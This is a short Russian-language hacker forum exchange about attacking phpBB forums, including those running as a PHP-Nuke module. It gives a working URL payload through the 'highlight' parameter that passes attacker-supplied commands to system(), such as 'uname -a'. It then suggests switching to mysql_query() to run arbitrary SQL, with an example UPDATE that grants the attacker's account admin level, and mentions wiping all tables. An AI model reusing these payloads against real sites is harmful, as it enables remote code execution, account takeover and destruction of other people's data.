xxx - это параметр в строке в который нужно писать команду, ее запустит system()
uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux
1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь
2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью
&highlight=%2527.system($_GET[xxx]).include%2527
Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора?
Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу ))
Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить...
Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx])
и вместо xxx писать SQL команды
Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID]
Или стереть все таблицы...
А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке.